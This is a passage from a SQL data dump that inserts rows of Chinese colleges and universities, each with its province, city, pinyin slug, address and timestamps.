22:14:08',NULL,'beijingzhongyiyaodaxuedongfangxueyuan',0,'廊坊','经济开发区',0,NULL,NULL),(2604,'北京交通大学海滨学院','河北','2017-09-12 09:23:27','2017-10-13 22:14:08',NULL,'beijingjiaotongdaxuehaibinxueyuan',0,'沧州','黄骅市学院西路9号',0,NULL,NULL),(2605,'河北东方学院','河北','2017-09-12 09:24:35','2017-10-13 22:14:08',NULL,'hebeidongfangxueyuan',0,'廊坊','东方大学城一期圣陶路',0,NULL,NULL),(2606,'河北环境工程学院','河北','2017-09-12 09:25:36','2017-10-13 22:14:08',NULL,'hebeihuanjinggongchengxueyuan',0,'秦皇岛','北戴河区金港大道8号',0,NULL,NULL),(2607,'河北对外经贸职业学院','河北','2017-09-12 09:28:09','2017-10-13 22:14:08',NULL,'hebeiduiwaijingmaozhiyexueyuan',0,'秦皇岛','南戴河前进路6号',0,NULL,NULL),(2608,'唐山幼儿师范高等专科学校','河北','2017-09-12 09:28:51','2017-10-13 22:14:08',NULL,'tangshanyouershifangaodengzhuankexuexiao',0,'唐山','滦县学府路3号',0,NULL,NULL),(2609,'曹妃甸职业技术学院','河北','2017-09-12 09:29:22','2017-10-13 22:14:08',NULL,'caofeidianzhiyejishuxueyuan',0,'唐山','曹妃甸区新港大道',0,NULL,NULL),(2610,'山西应用科技学院','山西','2017-09-12 09:29:51','2017-10-13 22:14:08',NULL,'shanxiyingyongkejixueyuan',0,'太原','小店区黄陵路39号',0,NULL,NULL),(2611,'山西大学商务学院','山西','2017-09-12 09:32:07','2017-10-13 22:14:08',NULL,'shanxidaxueshangwuxueyuan',0,'太原','太榆路武宿机场南',0,NULL,NULL),(2612,'山西工程技术学院','山西','2017-09-12 09:32:46','2017-10-13 22:14:08',NULL,'shanxigongchengjishuxueyuan',0,'阳泉','经济技术开发区学院路1号',0,NULL,NULL),(2613,'山西能源学院','山西','2017-09-12 09:34:20','2017-10-13 22:14:08',NULL,'shanxinengyuanxueyuan',0,'晋城','榆次区大学街63号',0,NULL,NULL),(2614,'内蒙古大学创业学院','内蒙古','2017-09-12 09:36:46','2017-10-13 22:14:08',NULL,'neimenggudaxuechuangyexueyuan',0,'呼和浩特','玉泉区昭君路24号',0,NULL,NULL),(2615,'内蒙古师范大学鸿德学院','内蒙古','2017-09-12 09:37:40','2017-10-13 22:14:08',NULL,'neimenggushifandaxuehongdexueyuan',0,'呼和浩特','机场路29号',0,NULL,NULL),(2616,'内蒙古艺术学院','内蒙古','2017-09-12 09:39:39','2017-10-13 22:14:08',NULL,'neimengguyishuxueyuan',0,'呼和浩特','呼和浩特',0,NULL,NULL),(2617,'鄂尔多斯应用技术学院','内蒙古','2017-09-12 09:40:38','2017-10-13 22:14:08',NULL,'eerduosiyingyongjishuxueyuan',0,'呼和浩特','默特左旗鄂尔多斯',0,NULL,NULL),(2618,'鄂尔多斯生态环境职业学院','内蒙古','2017-09-12 09:42:53','2017-10-13 22:14:08',NULL,'eerduosishengtaihuanjingzhiyexueyuan',0,'呼和浩特','康巴什新区新建鄂尔多斯体育中心南鄂尔多斯职业学院',0,NULL,NULL),(2619,'扎兰屯职业学院','内蒙古','2017-09-12 09:43:43','2017-10-13 22:14:08',NULL,'zhalantunzhiyexueyuan',0,'呼和浩特','扎兰屯市秀水路附近',0,NULL,NULL),(2620,'锦州医科大学','辽宁','2017-09-12 09:44:20','2017-10-13 22:14:08',NULL,'jinzhouyikedaxue',0,'锦州','松坡路三段40号',0,NULL,NULL),(2621,'辽宁警察学院','辽宁','2017-09-12 09:50:10','2017-10-13 22:14:08',NULL,'liaoningjingchaxueyuan',0,'大连','甘井子区营平路199号',0,NULL,NULL),(2622,'大连理工大学城市学院','辽宁','2017-09-12 09:50:46','2017-10-13 22:14:08',NULL,'dalianligongdaxuechengshixueyuan',0,'大连','经济技术开发区铁山西路31号',0,NULL,NULL),(2623,'沈阳工业大学工程学院','辽宁','2017-09-12 09:51:16','2017-10-13 22:14:08',NULL,'shenyanggongyedaxuegongchengxueyuan',0,'大连','宏伟区光华街30号',0,NULL,NULL),(2624,'沈阳航空航天大学北方科技学院','辽宁','2017-09-12 09:51:46','2017-10-13 22:14:08',NULL,'shenyanghangkonghangtiandaxuebeifangkejixueyuan',0,'沈阳','沈北新区沈北路81号',0,NULL,NULL),(2625,'大连工业大学艺术与信息工程学院','辽宁','2017-09-12 09:53:19','2017-10-13 22:14:08',NULL,'daliangongyedaxueyishuyuxinxigongchengxueyuan',0,'沈阳','庄河市',0,NULL,NULL),(2626,'中国医科大学临床医药学院','辽宁','2017-09-12 09:53:46','2017-10-13 22:14:08',NULL,'zhongguoyikedaxuelinchuangyiyaoxueyuan',0,'沈阳','和平区北五马路21号',0,NULL,NULL),(2627,'大连医科大学中山学院','辽宁','2017-09-12 09:54:17','2017-10-13 22:14:08',NULL,'dalianyikedaxuezhongshanxueyuan',0,'大连','高新园区爱贤街28号',0,NULL,NULL),(2628,'锦州医科大学医疗学院','辽宁','2017-09-12 09:55:01','2017-10-13 22:14:08',NULL,'jinzhouyikedaxueyiliaoxueyuan',0,'锦州','太和区高新技术产业园区昆明街2A号锦州医科大学医疗学院附近',0,NULL,NULL),(2629,'辽宁师范大学海华学院','辽宁','2017-09-12 09:55:34','2017-10-13 22:14:08',NULL,'liaoningshifandaxuehaihuaxueyuan',0,'沈阳','庄河前程大街117号',0,NULL,NULL),(2630,'辽宁石油化工大学顺华能源学院','辽宁','2017-09-12 09:56:31','2017-10-13 22:14:08',NULL,'liaoningshiyouhuagongdaxueshunhuanengyuanxueyuan',0,'抚顺','望花区丹东路西段10号',0,NULL,NULL),(2631,'辽宁中医药大学杏林学院','辽宁','2017-09-12 09:57:15','2017-10-13 22:14:08',NULL,'liaoningzhongyiyaodaxuexinglinxueyuan',0,'沈阳','东陵区白塔街380',0,NULL,NULL),(2632,'沈阳科技学院','辽宁','2017-09-12 09:57:35','2017-10-13 22:14:08',NULL,'shenyangkejixueyuan',0,'沈阳','浑南区全运二西路30号',0,NULL,NULL),(2633,'辽宁传媒学院','辽宁','2017-09-12 09:57:58','2017-10-13 22:14:08',NULL,'liaoningchuanmeixueyuan',0,'沈阳','沈北新区沈北路30号',0,NULL,NULL),(2634,'辽宁省交通高等专科学校','辽宁','2017-09-12 10:00:10','2017-10-13 22:14:08',NULL,'liaoningshengjiaotonggaodengzhuankexuexiao',0,'沈阳','沈北新区沈北路102号',0,NULL,NULL),(2635,'辽宁医药职业学院','辽宁','2017-09-12 10:01:00','2017-10-13 22:14:08',NULL,'liaoningyiyaozhiyexueyuan',0,'沈阳','苏家屯区乔松路2号',0,NULL,NULL),(2636,'辽宁特殊教育师范高等专科学校','辽宁','2017-09-12 10:01:47','2017-10-13 22:14:08',NULL,'liaoningteshujiaoyushifangaodengzhuankexuexiao',0,'沈阳','东陵区柏叶306号',0,NULL,NULL),(2637,'长春工业大学人文信息学院','吉林','2017-09-12 10:02:36','2017-10-13 22:14:08',NULL,'changchungongyedaxuerenwenxinxixueyuan',0,'长春','南关区福祉大路1016号',0,NULL,NULL),(2638,'长春理工大学光电信息学院','吉林','2017-09-12 10:04:13','2017-10-13 22:14:08',NULL,'changchunligongdaxueguangdianxinxixueyuan',0,'长春','宽城区学理路333号',0,NULL,NULL),(2639,'长春财经学院','吉林','2017-09-12 10:05:09','2017-10-13 22:14:08',NULL,'changchuncaijingxueyuan',0,'长春','净月国家高新技术产业开发区擎天树街58号',0,NULL,NULL),(2640,'吉林建筑大学城建学院','吉林','2017-09-12 10:05:31','2017-10-13 22:14:07',NULL,'jilinjianzhudaxuechengjianxueyuan',0,'长春','宽城区学建大路1111号',0,NULL,NULL),(2641,'吉林师范大学博达学院','吉林','2017-09-12 10:05:59','2017-10-13 22:14:07',NULL,'jilinshifandaxuebodaxueyuan',0,'四平','铁西区果园街217-3号',0,NULL,NULL),(2642,'长春大学旅游学院','吉林','2017-09-12 10:28:11','2017-10-13 22:14:07',NULL,'changchundaxuelvyouxueyuan',0,'长春','双阳区奢岭镇长清公路15公里处',0,NULL,NULL),(2643,'东北师范大学人文学院','吉林','2017-09-12 10:28:51','2017-10-13 22:14:07',NULL,'dongbeishifandaxuerenwenxueyuan',0,'长春','净月国家高新产业开发区博硕路1488号',0,NULL,NULL),(2644,'长春师范高等专科学校','吉林','2017-09-12 10:29:25','2017-10-13 22:14:07',NULL,'changchunshifangaodengzhuankexuexiao',0,'长春','农安县合隆镇长隆大街2015-1号',0,NULL,NULL),(2645,'吉林工程职业学院','吉林','2017-09-12 10:29:57','2017-10-13 22:14:07',NULL,'jilingongchengzhiyexueyuan',0,'四平','铁东区长发路1299号',0,NULL,NULL),(2646,'吉林职业技术学院','吉林','2017-09-12 10:31:11','2017-10-13 22:14:07',NULL,'jilinzhiyejishuxueyuan',0,'吉林','延边朝鲜自治州龙井市海兰西路1095号',0,NULL,NULL),(2647,'吉林水利电力职业学院','吉林','2017-09-12 10:32:15','2017-10-13 22:14:07',NULL,'jilinshuilidianlizhiyexueyuan',0,'长春','净月开发区聚业大街',0,NULL,NULL),(2648,'长春健康职业学院','吉林','2017-09-12 10:32:55','2017-10-13 22:14:07',NULL,'changchunjiankangzhiyexueyuan',0,'长春','朝阳区',0,NULL,NULL),(2649,'哈尔滨信息工程学院','黑龙江','2017-09-12 10:33:42','2017-10-13 22:14:07',NULL,'haerbinxinxigongchengxueyuan',0,'哈尔滨','利民开发区学院路950号',0,NULL,NULL),(2650,'黑龙江工商学院','黑龙江','2017-09-12 10:34:28','2017-10-13 22:14:07',NULL,'heilongjianggongshangxueyuan',0,'哈尔滨','利民开发区学院路群英街33号',0,NULL,NULL),(2651,'黑龙江工程学院昆仑旅游学院','黑龙江','2017-09-12 10:36:14','2017-10-13 22:14:07',NULL,'heilongjianggongchengxueyuankunlunlvyouxueyuan',0,'哈尔滨','二龙山风景区',0,NULL,NULL),(2652,'哈尔滨音乐学院','黑龙江','2017-09-12 10:36:36','2017-10-13 22:14:07',NULL,'haerbinyinlexueyuan',0,'哈尔滨','丁香大道2729号',0,NULL,NULL),(2653,'哈尔滨城市职业学院','黑龙江','2017-09-12 10:37:13','2017-10-13 22:14:07',NULL,'haerbinchengshizhiyexueyuan',0,'哈尔滨','香坊区上京大学城哈阿公路七公里',0,NULL,NULL),(2654,'黑龙江能源职业学院','黑龙江','2017-09-12 10:37:46','2017-10-13 22:14:07',NULL,'heilongjiangnengyuanzhiyexueyuan',0,'双鸭山','迎宾大道公立街',0,NULL,NULL),(2655,'黑龙江冰雪体育职业学院','黑龙江','2017-09-12 10:38:09','2017-10-13 22:14:07',NULL,'heilongjiangbingxuetiyuzhiyexueyuan',0,'哈尔滨','松花江避暑城',0,NULL,NULL),(2656,'上海兴伟学院','上海','2017-09-12 10:38:57','2017-10-13 22:14:07',NULL,'shanghaixingweixueyuan',0,'崇明','惠南镇城南路1635号',0,NULL,NULL),(2657,'上海外国语大学贤达经济人文学院','上海','2017-09-12 10:40:32','2017-10-13 22:14:07',NULL,'shanghaiwaiguoyudaxuexiandajingjirenwenxueyuan',0,'虹口','东体育会路390号',0,NULL,NULL),(2658,'上海师范大学天华学院','上海','2017-09-12 10:40:58','2017-10-13 22:14:07',NULL,'shanghaishifandaxuetianhuaxueyuan',0,'嘉定','胜辛北路1661号',0,NULL,NULL),(2659,'上海科技大学','上海','2017-09-12 10:41:23','2017-10-13 22:14:07',NULL,'shanghaikejidaxue',0,'浦东','海科路100号',0,NULL,NULL),(2660,'上海工商职业技术学院','上海','2017-09-12 10:41:52','2017-10-13 22:14:07',NULL,'shanghaigongshangzhiyejishuxueyuan',0,'嘉定','外冈镇冈峰公路68号',0,NULL,NULL),(2661,'上海城建职业学院','上海','2017-09-12 10:42:17','2017-10-13 22:14:07',NULL,'shanghaichengjianzhiyexueyuan',0,'奉贤','南亭公路2080号',0,NULL,NULL),(2662,'徐州医科大学','江苏','2017-09-12 10:42:52','2017-10-13 22:14:07',NULL,'xuzhouyikedaxue',0,'徐州','铜山路209号',0,NULL,NULL),(2663,'南通理工学院','江苏','2017-09-12 10:43:17','2017-10-13 22:14:07',NULL,'nantongligongxueyuan',0,'南通','港闸经济开发区永兴路14号',1,NULL,'2018-01-01 10:00:00'),(2664,'中国矿业大学徐海学院','江苏','2017-09-12 10:43:42','2017-10-13 22:14:07',NULL,'zhongguokuangyedaxuexuhaixueyuan',0,'徐州','泉山区金山东路1号',0,NULL,NULL),(2665,'南京大学金陵学院','江苏','2017-09-12 10:44:16','2017-10-13 22:14:07',NULL,'nanjingdaxuejinlingxueyuan',0,'南京','浦口区沿江镇学府路8号',0,NULL,NULL),(2666,'南京理工大学紫金学院','江苏','2017-09-12 10:44:36','2017-10-13 22:14:07',NULL,'nanjingligongdaxuezijinxueyuan',0,'南京','仙林大学城文澜路89号',0,NULL,NULL),(2667,'南京航空航天大学金城学院','江苏','2017-09-12 10:45:07','2017-10-13 22:14:07',NULL,'nanjinghangkonghangtiandaxuejinchengxueyuan',0,'南京','江宁区禄口街道航金大道88号',0,NULL,NULL),(2668,'南京理工大学泰州科技学院','江苏','2017-09-12 10:45:38','2017-10-13 22:14:07',NULL,'nanjingligongdaxuetaizhoukejixueyuan',0,'泰州','梅兰东路8号',0,NULL,NULL),(2669,'南京师范大学泰州学院','江苏','2017-09-12 10:46:10','2017-10-13 22:14:07',NULL,'nanjingshifandaxuetaizhouxueyuan',0,'泰州','东风南路518号',0,NULL,NULL),(2670,'南京工业大学浦江学院','江苏','2017-09-12 10:47:23','2017-10-13 22:14:07',NULL,'nanjinggongyedaxuepujiangxueyuan',0,'南京','江宁区汤峰路96号',0,NULL,NULL),(2671,'南京师范大学中北学院','江苏','2017-09-12 10:47:45','2017-10-13 22:14:07',NULL,'nanjingshifandaxuezhongbeixueyuan',0,'南京','仙林大学城学林路2号',0,NULL,NULL),(2672,'南京医科大学康达学院','江苏','2017-09-12 10:48:22','2017-10-13 22:14:07',NULL,'nanjingyikedaxuekangdaxueyuan',0,'连云港','海州区花果山大道春晖路88号',0,NULL,NULL),(2673,'南京中医药大学翰林学院','江苏','2017-09-12 10:48:48','2017-10-13 22:14:07',NULL,'nanjingzhongyiyaodaxuehanlinxueyuan',0,'泰州','中国医药城学院路6号',0,NULL,NULL),(2674,'南京信息工程大学滨江学院','江苏','2017-09-12 10:49:11','2017-10-13 22:14:07',NULL,'nanjingxinxigongchengdaxuebinjiangxueyuan',0,'南京','新区浦口龙山北路6号',0,NULL,NULL),(2675,'苏州大学文正学院','江苏','2017-09-12 10:49:42','2017-10-13 22:14:07',NULL,'suzhoudaxuewenzhengxueyuan',0,'苏州','吴中区吴中大道1188号(近城隍山牌坊)',0,NULL,NULL),(2676,'苏州大学应用技术学院','江苏','2017-09-12 10:50:11','2017-10-13 22:14:07',NULL,'suzhoudaxueyingyongjishuxueyuan',0,'苏州','昆山周庄镇大学路一号',0,NULL,NULL),(2677,'苏州科技大学天平学院','江苏','2017-09-12 10:51:02','2017-10-13 22:14:07',NULL,'suzhoukejidaxuetianpingxueyuan',0,'苏州','高新区长江路55号',0,NULL,NULL),(2678,'江苏大学京江学院','江苏','2017-09-12 10:51:40','2017-10-13 22:14:07',NULL,'jiangsudaxuejingjiangxueyuan',0,'镇江','学府路301号',0,NULL,NULL),(2679,'扬州大学广陵学院','江苏','2017-09-12 10:52:16','2017-10-13 22:14:07',NULL,'yangzhoudaxueguanglingxueyuan',0,'扬州','邗江区江阳中路131号',0,NULL,NULL),(2680,'江苏师范大学科文学院','江苏','2017-09-12 10:52:43','2017-10-13 22:14:07',NULL,'jiangsushifandaxuekewenxueyuan',0,'徐州','铜山区上海路101号',0,NULL,NULL),(2681,'南京邮电大学通达学院','江苏','2017-09-12 10:53:10','2017-10-13 22:14:07',NULL,'nanjingyoudiandaxuetongdaxueyuan',0,'扬州','润扬南路33号',0,NULL,NULL),(2682,'南京财经大学红山学院','江苏','2017-09-12 10:53:54','2017-10-13 22:14:07',NULL,'nanjingcaijingdaxuehongshanxueyuan',0,'南京','鼓楼区铁路北街128号 ',0,NULL,NULL),(2683,'江苏科技大学苏州理工学院','江苏','2017-09-12 10:54:17','2017-10-13 22:14:07',NULL,'jiangsukejidaxuesuzhouligongxueyuan',0,'张家港','长兴中路8号',0,NULL,NULL),(2684,'常州大学怀德学院','江苏','2017-09-12 10:55:08','2017-10-13 22:14:07',NULL,'changzhoudaxuehuaidexueyuan',0,'泰州','新港大道136号',0,NULL,NULL),(2685,'南通大学杏林学院','江苏','2017-09-12 10:55:55','2017-10-13 22:14:07',NULL,'nantongdaxuexinglinxueyuan',0,'南通','外环东路999号',0,NULL,NULL),(2686,'南京审计大学金审学院','江苏','2017-09-12 10:56:25','2017-10-13 22:14:07',NULL,'nanjingshenjidaxuejinshenxueyuan',0,'南京','仙林大学城仙林大道100号',0,NULL,NULL),(2687,'昆山杜克大学','江苏','2017-09-12 10:57:01','2017-10-13 22:14:07',NULL,'kunshandukedaxue',0,'昆山','杜克大道8号',0,NULL,NULL),(2688,'盐城幼儿师范高等专科学校','江苏','2017-09-12 10:57:38','2017-10-13 22:14:07',NULL,'yanchengyouershifangaodengzhuankexuexiao',0,'盐城','海洋路28号',0,NULL,NULL),(2689,'苏州幼儿师范高等专科学校','江苏','2017-09-12 10:57:56','2017-10-13 22:14:07',NULL,'suzhouyouershifangaodengzhuankexuexiao',0,'苏州','相城区华元路2号',0,NULL,NULL),(2690,'江苏工程职业技术学院','江苏','2017-09-12 10:58:39','2017-10-13 22:14:07',NULL,'jiangsugongchengzhiyejishuxueyuan',0,'南通','青年中路87号',0,NULL,NULL),(2691,'江苏医药职业学院','江苏','2017-09-12 10:58:59','2017-10-13 22:14:07',NULL,'jiangsuyiyaozhiyexueyuan',0,'盐城','解放南路283号',0,NULL,NULL),(2692,'南通科技职业学院','江苏','2017-09-12 10:59:16','2017-10-13 22:14:07',NULL,'nantongkejizhiyexueyuan',0,'南通','青年中路136号',0,NULL,NULL),(2693,'南京科技职业学院','江苏','2017-09-12 11:00:08','2017-10-13 22:14:07',NULL,'nanjingkejizhiyexueyuan',0,'南京','六合区欣乐路188号',0,NULL,NULL),(2694,'苏州健雄职业技术学院','江苏','2017-09-12 11:00:48','2017-10-13 22:14:07',NULL,'suzhoujianxiongzhiyejishuxueyuan',0,'太仓','南郊新城区济南路1号',0,NULL,NULL),(2695,'苏州百年职业学院','江苏','2017-09-12 11:01:27','2017-10-13 22:14:07',NULL,'suzhoubainianzhiyexueyuan',0,'苏州','工业园区独墅湖高教区',0,NULL,NULL),(2696,'江苏卫生健康职业学院','江苏','2017-09-12 11:02:00','2017-10-13 22:14:07',NULL,'jiangsuweishengjiankangzhiyexueyuan',0,'南京','浦口区黄山岭路69号',0,NULL,NULL),(2697,'南通师范高等专科学校','江苏','2017-09-12 11:02:33','2017-10-13 22:14:07',NULL,'nantongshifangaodengzhuankexuexiao',0,'南通','崇川区龙腾路',0,NULL,NULL),(2698,'扬州中瑞酒店职业学院','江苏','2017-09-12 11:03:31','2017-10-13 22:14:07',NULL,'yangzhouzhongruijiudianzhiyexueyuan',0,'扬州','邗江区站南路500号',0,NULL,NULL),(2699,'江苏护理职业学院','江苏','2017-09-12 11:04:13','2017-10-13 22:14:07',NULL,'jiangsuhulizhiyexueyuan',0,'淮安','淮阴区黄河西路2号',0,NULL,NULL),(2700,'江苏财会职业学院','江苏','2017-09-12 11:04:53','2017-10-13 22:14:07',NULL,'jiangsucaihuizhiyexueyuan',0,'连云港','海州区春晖路8号',0,NULL,NULL),(2701,'江苏城乡建设职业学院','江苏','2017-09-12 11:10:19','2017-10-13 22:14:07',NULL,'jiangsuchengxiangjianshezhiyexueyuan',0,'常州','钟楼区殷村职教园和裕路1号',0,NULL,NULL),(2702,'江苏航空职业技术学院','江苏','2017-09-12 11:10:55','2017-10-13 22:14:07',NULL,'jiangsuhangkongzhiyejishuxueyuan',0,'镇江','镇江新区瑞成路88号',0,NULL,NULL),(2703,'江苏安全技术职业学院','江苏','2017-09-12 14:43:09','2017-10-13 22:14:07',NULL,'jiangsuanquanjishuzhiyexueyuan',0,'徐州','贾汪区育才路1号',0,NULL,NULL),(2704,'江苏旅游职业学院','江苏','2017-09-12 14:43:57','2017-10-13 22:14:07',NULL,'jiangsulvyouzhiyexueyuan',0,'扬州','扬子津教科教园内',0,NULL,NULL),(2705,'浙江大学城市学院','浙江','2017-09-12 14:44:20','2017-10-13 22:14:07',NULL,'zhejiangdaxuechengshixueyuan',0,'杭州','拱墅区湖州街51号',0,NULL,NULL),(2706,'浙江大学宁波理工学院','浙江','2017-09-12 14:44:46','2017-10-13 22:14:07',NULL,'zhejiangdaxueningboligongxueyuan',0,'宁波','鄞州高教园区钱湖南路1号',0,NULL,NULL),(2707,'杭州医学院','浙江','2017-09-12 14:46:51','2017-10-13 22:14:07',NULL,'hangzhouyixueyuan',0,'杭州','滨江高教园区滨文路481号',0,NULL,NULL),(2708,'浙江工业大学之江学院','浙江','2017-09-12 14:47:30','2017-10-13 22:14:07',NULL,'zhejianggongyedaxuezhijiangxueyuan',0,'绍兴','柯桥区',0,NULL,NULL),(2709,'浙江师范大学行知学院','浙江','2017-09-12 14:53:21','2017-10-13 22:14:07',NULL,'zhejiangshifandaxuexingzhixueyuan',0,'金华','兰溪市迎宾大道3388号',1,NULL,'2018-01-01 10:00:00'),(2710,'宁波大学科学技术学院','浙江','2017-09-12 14:54:04','2017-10-13 22:14:07',NULL,'ningbodaxuekexuejishuxueyuan',0,'宁波','江北区风华路818号',0,NULL,NULL),(2711,'杭州电子科技大学信息工程 学院','浙江','2017-09-12 14:57:51','2017-10-13 22:14:07',NULL,'hangzhoudianzikejidaxuexinxigongchengxueyuan',0,'杭州','临安区青山湖街道胜联路168号',0,NULL,NULL),(2712,'浙江理工大学科技与艺术学院','浙江','2017-09-12 14:58:40','2017-10-13 22:14:07',NULL,'zhejiangligongdaxuekejiyuyishuxueyuan',0,'绍兴','上虞区滨海新城康阳大道',0,NULL,NULL),(2713,'浙江海洋大学东海科学技术学院','浙江','2017-09-12 14:59:17','2017-10-13 22:14:07',NULL,'zhejianghaiyangdaxuedonghaikexuejishuxueyuan',0,'舟山','定海区海院路18号',0,NULL,NULL),(2714,'浙江农林大学暨阳学院','浙江','2017-09-12 14:59:53','2017-10-13 22:14:07',NULL,'zhejiangnonglindaxuejiyangxueyuan',0,'绍兴','浦阳路77号',0,NULL,NULL),(2715,'温州医科大学仁济学院','浙江','2017-09-12 15:00:24','2017-10-13 22:14:07',NULL,'wenzhouyikedaxuerenjixueyuan',0,'温州','茶山高教园区',0,NULL,NULL),(2716,'浙江中医药大学滨江学院','浙江','2017-09-12 15:00:44','2017-10-13 22:14:07',NULL,'zhejiangzhongyiyaodaxuebinjiangxueyuan',0,'杭州','滨江区滨文路548号',0,NULL,NULL),(2717,'杭州师范大学钱江学院','浙江','2017-09-12 15:01:04','2017-10-13 22:14:07',NULL,'hangzhoushifandaxueqianjiangxueyuan',0,'杭州','下沙高教园区学林街16号',0,NULL,NULL),(2718,'湖州师范学院求真学院','浙江','2017-09-12 15:01:29','2017-10-13 22:14:07',NULL,'huzhoushifanxueyuanqiuzhenxueyuan',0,'湖州','学士路158号',0,NULL,NULL),(2719,'绍兴文理学院元培学院','浙江','2017-09-12 15:01:51','2017-10-13 22:14:07',NULL,'shaoxingwenlixueyuanyuanpeixueyuan',0,'绍兴','越城区群贤中路2799号',0,NULL,NULL),(2720,'温州大学瓯江学院','浙江','2017-09-12 15:02:16','2017-10-13 22:14:07',NULL,'wenzhoudaxueoujiangxueyuan',0,'温州','茶山高教园区温州大学北校区',0,NULL,NULL),(2721,'浙江工商大学杭州商学院','浙江','2017-09-12 15:02:44','2017-10-13 22:14:07',NULL,'zhejianggongshangdaxuehangzhoushangxueyuan',0,'杭州','桐庐县环城南路66号',0,NULL,NULL),(2722,'嘉兴学院南湖学院','浙江','2017-09-12 15:03:06','2017-10-13 22:14:07',NULL,'jiaxingxueyuannanhuxueyuan',0,'嘉兴','越秀南路56号',0,NULL,NULL),(2723,'中国计量大学现代科技学院','浙江','2017-09-12 15:03:34','2017-10-13 22:14:07',NULL,'zhongguojiliangdaxuexiandaikejixueyuan',0,'杭州','江干区学源街168号',0,NULL,NULL),(2724,'浙江财经大学东方学院','浙江','2017-09-12 15:04:20','2017-10-13 22:14:07',NULL,'zhejiangcaijingdaxuedongfangxueyuan',0,'嘉兴','海宁市连杭经济开发区高新区仰山路2号',0,NULL,NULL),(2725,'温州商学院','浙江','2017-09-12 15:04:45','2017-10-13 22:14:07',NULL,'wenzhoushangxueyuan',0,'温州','茶山高教园区',0,NULL,NULL),(2726,'同济大学浙江学院','浙江','2017-09-12 15:05:29','2017-10-13 22:14:07',NULL,'tongjidaxuezhejiangxueyuan',0,'嘉兴','南湖区商务大道168号',0,NULL,NULL),(2727,'上海财经大学浙江学院','浙江','2017-09-12 15:05:51','2017-10-13 22:14:07',NULL,'shanghaicaijingdaxuezhejiangxueyuan',0,'金华','环城南路99号',0,NULL,NULL),(2728,'浙江音乐学院','浙江','2017-09-12 15:06:08','2017-10-13 22:14:07',NULL,'zhejiangyinlexueyuan',0,'杭州','西湖区转塘街道浙音路1号',0,NULL,NULL),(2729,'温州肯恩大学','浙江','2017-09-12 15:06:29','2017-10-13 22:14:07',NULL,'wenzhoukenendaxue',0,'温州','瓯海区大学路88号',0,NULL,NULL),(2730,'浙江特殊教育职业学院','浙江','2017-09-12 15:06:47','2017-10-13 22:14:07',NULL,'zhejiangteshujiaoyuzhiyexueyuan',0,'杭州','西湖区留和路527号',0,NULL,NULL),(2731,'浙江安防职业技术学院','浙江','2017-09-12 15:07:34','2017-10-13 22:14:07',NULL,'zhejianganfangzhiyejishuxueyuan',0,'温州','瓯海大道2555号',0,NULL,NULL),(2732,'浙江舟山群岛新区旅游与健康职业学院','浙江','2017-09-12 15:08:16','2017-10-13 22:14:07',NULL,'zhejiangzhoushanqundaoxinqulvyouyujiankangzhiyexueyuan',0,'舟山','普陀区朱家尖学院路99号',0,NULL,NULL),(2733,'安徽财经大学商学院','安徽','2017-09-12 15:20:43','2017-10-13 22:14:07',NULL,'anhuicaijingdaxueshangxueyuan',0,'蚌埠','东海大道7100号(禹会校区)',0,NULL,NULL),(2734,'安徽大学江淮学院','安徽','2017-09-12 15:21:18','2017-10-13 22:14:07',NULL,'anhuidaxuejianghuaixueyuan',0,'合肥','肥西路3号',0,NULL,NULL),(2735,'安徽信息工程学院','安徽','2017-09-12 15:21:54','2017-10-13 22:14:07',NULL,'anhuixinxigongchengxueyuan',0,'芜湖','弋江区文津西路8号',0,NULL,NULL),(2736,'安徽工业大学工商学院','安徽','2017-09-12 15:22:19','2017-10-13 22:14:07',NULL,'anhuigongyedaxuegongshangxueyuan',0,'马鞍山','湖东路59号安徽省马鞍山市当涂县姑孰镇黄池路8号(新校区)',0,NULL,NULL),(2737,'安徽建筑大学城市建设学院','安徽','2017-09-12 15:22:39','2017-10-13 22:14:07',NULL,'anhuijianzhudaxuechengshijianshexueyuan',0,'合肥','巢湖黄麓科教园',0,NULL,NULL),(2738,'安徽农业大学经济技术学院','安徽','2017-09-12 15:22:58','2017-10-13 22:14:07',NULL,'anhuinongyedaxuejingjijishuxueyuan',0,'合肥','新站区学府路1号',0,NULL,NULL),(2739,'安徽师范大学皖江学院','安徽','2017-09-12 15:23:25','2017-10-13 22:14:07',NULL,'anhuishifandaxuewanjiangxueyuan',0,'芜湖','九华北路171号',0,NULL,NULL),(2740,'安徽医科大学临床医学院','安徽','2017-09-12 15:23:42','2017-10-13 22:14:07',NULL,'anhuiyikedaxuelinchuangyixueyuan',0,'合肥','经济开发区翡翠路15号',0,NULL,NULL),(2741,'阜阳师范学院信息工程学院','安徽','2017-09-12 15:24:03','2017-10-13 22:14:07',NULL,'fuyangshifanxueyuanxinxigongchengxueyuan',0,'阜阳','颍州区清河东路741号',0,NULL,NULL),(2742,'淮北师范大学信息学院','安徽','2017-09-12 15:24:32','2017-10-13 22:14:07',NULL,'huaibeishifandaxuexinxixueyuan',0,'淮北','东山路100号',0,NULL,NULL),(2743,'河海大学文天学院','安徽','2017-09-12 15:24:55','2017-10-13 22:14:07',NULL,'hehaidaxuewentianxueyuan',0,'马鞍山','霍里山大道333号',0,NULL,NULL),(2744,'安徽卫生健康职业学院','安徽','2017-09-12 15:25:43','2017-10-13 22:14:07',NULL,'anhuiweishengjiankangzhiyexueyuan',0,'合肥','皖池州市教育园区学院路9号',0,NULL,NULL),(2745,'皖北卫生职业学院','安徽','2017-09-12 15:27:03','2017-10-13 22:14:07',NULL,'wanbeiweishengzhiyexueyuan',0,'宿州','东二铺大学园区',0,NULL,NULL),(2746,'阜阳幼儿师范高等专科学校','安徽','2017-09-12 15:27:36','2017-10-13 22:14:07',NULL,'fuyangyouershifangaodengzhuankexuexiao',0,'阜阳','颍西镇临泉路558号',0,NULL,NULL),(2747,'福建商学院','福建','2017-09-12 15:28:17','2017-10-13 22:14:07',NULL,'fujianshangxueyuan',0,'福州','鼓楼区黄铺19号',0,NULL,NULL),(2748,'福建师范大学闽南科技学院','福建','2017-09-12 15:28:56','2017-10-13 22:14:07',NULL,'fujianshifandaxueminnankejixueyuan',0,'福州','康美开发区康元路8号',0,NULL,NULL),(2749,'福建农林大学东方学院','福建','2017-09-12 15:29:20','2017-10-13 22:14:07',NULL,'fujiannonglindaxuedongfangxueyuan',0,'福州','马尾区琅岐镇龙鼓度假村1号',0,NULL,NULL),(2750,'厦门工学院','福建','2017-09-12 15:29:39','2017-10-13 22:14:07',NULL,'shamengongxueyuan',0,'厦门','后溪镇孙坂南路1251号',0,NULL,NULL),(2751,'阳光学院','福建','2017-09-12 15:29:57','2017-10-13 